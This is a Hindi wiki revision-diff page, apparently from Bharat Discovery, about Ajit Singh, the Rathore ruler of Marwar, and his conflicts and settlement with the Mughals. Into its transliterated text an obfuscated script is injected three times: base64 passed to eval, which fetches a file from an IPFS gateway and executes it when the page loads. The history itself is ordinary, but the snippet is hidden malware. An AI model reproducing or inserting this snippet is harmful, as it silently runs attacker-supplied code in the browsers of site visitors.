Difference between revisions of "अजीत सिंह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:मध्य काल (को हटा दिया गया हैं।))
 
(9 intermediate revisions by 5 users not shown)
Line 1: Line 1:
अजीत सिंह मारवाड़ के राजा जसवन्त सिंह का पुत्र था। उसका जन्म 1679 ई. में [[लाहौर]] में पिता की मृत्यु के बाद हुआ। अजीत सिंह को [[दिल्ली]] लाया गया, जहाँ पर [[औरंगज़ेब]] उसे [[मुसलमान]] बना लेना चाहता था। राठौर सरदार दुर्गादास बड़े साहस के साथ अजीत सिंह को दिल्ली से निकाल कर मारवाड़ ले गया। अजीत सिंह के मामले को लेकर मारवाड़ के राठौर सरदारों और [[मेवाड़]] के राणा तथा औरंगज़ेब में लम्बा युद्ध छिड़ गया, जो 1709 ई. तक चला। जब औरंगज़ेब की मृत्यु के बाद उसके लड़के और उत्तराधिकारी बादशाह बहादुर शाह प्रथम ने राजपूतों से सुलह कर ली। अजीत सिंह ने अपनी कन्या का विवाह बारशाह फ़र्रुख़सियर से किया और उससे सुलह कर ली। जिससे मुग़ल दरबार में उसका प्रभाव बढ़ गया। सैयद बन्धुओं ने उसकी सहायता माँगी और उसको [[अजमेर]]-[[गुजरात]] का सूबेदार नियुक्त कर दिया। इस प्रकार अजमेर से पश्चिमी समुद्र तट तक का सारा प्रदेश उसके अधीन हो गया। उसे हिन्दुओं को संगठित करके मुग़ल सल्तनत का तख़्ता पलट करने का अच्छा अवसर प्राप्त हुआ था, किन्तु उसने इस अवसर का कोई भी लाभ नहीं उठाया। उसके लड़के भक्तसिंह ने रहस्यमय रीति से उसकी हत्या कर दी।<ref>भारतीय इतिहास कोश पृष्ठ संख्या-07</ref>
+
{{बहुविकल्प|बहुविकल्पी शब्द=अजीत सिंह|लेख का नाम=अजीत सिंह (बहुविकल्पी)}}
{{लेख प्रगति
+
'''अजीत सिंह''' [[मारवाड़]] के राजा [[जसवंत सिंह (राजा)|जसवंत सिंह]] का पुत्र था। उसका जन्म 1679 ई. में [[लाहौर]] में हुआ। उसके जन्म से पहले ही उसके पिता की मृत्यु हो चुकी थी। कुछ समय पश्चात् अजीत सिंह को [[दिल्ली]] लाया गया, जहाँ पर [[मुग़ल]] बादशाह [[औरंगज़ेब]] उसे [[मुस्लिम]] बना लेना चाहता था। राठौर सरदार [[दुर्गादास]] बड़े साहस के साथ अजीत सिंह को दिल्ली से निकाल कर मारवाड़ ले गया।
|आधार=
+
==मुग़लों से सुलह==
|प्रारम्भिक=प्रारम्भिक1
+
अजीत सिंह के मामले को लेकर मारवाड़ के राठौर सरदारों और [[मेवाड़]] के राणा तथा औरंगज़ेब में एक लम्बा युद्ध छिड़ गया, जो 1709 ई. तक चला। जब औरंगज़ेब की मृत्यु हो गई तब उसके लड़के और [[मुग़ल साम्राज्य]] के अगले उत्तराधिकारी बादशाह [[बहादुर शाह प्रथम]] ने [[राजपूत|राजपूतों]] से सुलह कर ली। अजीत सिंह ने अपनी कन्या का विवाह बादशाह [[फ़र्रुख़सियर]] से किया और उससे सुलह कर ली, जिससे [[मुग़ल]] दरबार में उसका प्रभाव बढ़ गया।
|माध्यमिक=
+
==मृत्यु==
|पूर्णता=
+
[[सैयद बन्धु|सैयद बन्धुओं]] ने अजीत सिंह से सहायता माँगी और उसको [[अजमेर]]-[[गुजरात]] का सूबेदार नियुक्त कर दिया। इस प्रकार अजमेर से पश्चिमी समुद्र तट तक का सारा प्रदेश अजीत सिंह के अधीन हो गया। उसे [[हिन्दू|हिन्दुओं]] को संगठित करके [[मुग़ल]] सल्तनत का तख़्ता पलट करने का अच्छा अवसर प्राप्त हुआ था, किन्तु उसने इस अवसर का कोई भी लाभ नहीं उठाया। उसके लड़के भक्तसिंह ने रहस्यमय रीति से उसकी हत्या कर दी।
|शोध=
+
 
}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय इतिहास कोश |लेखक= सच्चिदानन्द भट्टाचार्य|अनुवादक= |आलोचक= |प्रकाशक=उत्तर प्रदेश हिन्दी संस्थान |संकलन= |संपादन= |पृष्ठ संख्या=07|url=}}
 
<references/>
 
<references/>
__INDEX__
+
==संबंधित लेख==
 
+
{{मध्य काल}}
 
[[Category:मुग़ल साम्राज्य]]
 
[[Category:मुग़ल साम्राज्य]]
 
[[Category:मध्य काल]]
 
[[Category:मध्य काल]]
 +
[[Category:इतिहास कोश]]
 +
__INDEX__
 +
__NOTOC__

Latest revision as of 12:23, 11 February 2020

chitr:Disamb2.jpg ajit sianh ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- ajit sianh (bahuvikalpi)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ajit sianh marava d ke raja jasavant sianh ka putr tha. usaka janm 1679 ee. mean lahaur mean hua. usake janm se pahale hi usake pita ki mrityu ho chuki thi. kuchh samay pashchath ajit sianh ko dilli laya gaya, jahaan par mugal badashah aurangazeb use muslim bana lena chahata tha. rathaur saradar durgadas b de sahas ke sath ajit sianh ko dilli se nikal kar marava d le gaya.

mugaloan se sulah

ajit sianh ke mamale ko lekar marava d ke rathaur saradaroan aur meva d ke rana tatha aurangazeb mean ek lamba yuddh chhi d gaya, jo 1709 ee. tak chala. jab aurangazeb ki mrityu ho gee tab usake l dake aur mugal samrajy ke agale uttaradhikari badashah bahadur shah pratham ne rajapootoan se sulah kar li. ajit sianh ne apani kanya ka vivah badashah farrukhasiyar se kiya aur usase sulah kar li, jisase mugal darabar mean usaka prabhav badh gaya.

mrityu

saiyad bandhuoan ne ajit sianh se sahayata maangi aur usako ajamer-gujarat ka soobedar niyukt kar diya. is prakar ajamer se pashchimi samudr tat tak ka sara pradesh ajit sianh ke adhin ho gaya. use hinduoan ko sangathit karake mugal saltanat ka takhta palat karane ka achchha avasar prapt hua tha, kintu usane is avasar ka koee bhi labh nahian uthaya. usake l dake bhaktasianh ne rahasyamay riti se usaki hatya kar di.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bharatiy itihas kosh |lekhak: sachchidanand bhattachary |prakashak: uttar pradesh hindi sansthan |prishth sankhya: 07 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>